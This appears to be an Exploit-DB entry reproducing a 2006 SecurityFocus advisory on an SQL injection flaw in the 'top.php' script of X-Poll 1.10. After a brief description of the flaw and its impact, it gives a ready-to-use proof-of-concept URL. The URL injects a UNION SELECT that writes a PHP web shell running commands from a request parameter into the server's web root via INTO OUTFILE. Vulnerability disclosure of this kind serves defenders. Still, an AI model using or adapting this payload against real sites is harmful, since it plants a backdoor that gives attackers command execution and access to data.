X-Scripts X-Poll 1.10 - 'top.php' SQL Injection

EDB-ID:

28304




Platform:

PHP

Date:

2006-07-29


source: https://www.securityfocus.com/bid/19236/info

X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

X-Poll 1.10 is vulnerable to this issue.

http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
OUTFILE '/usr/webserver/public_htm/rshell.php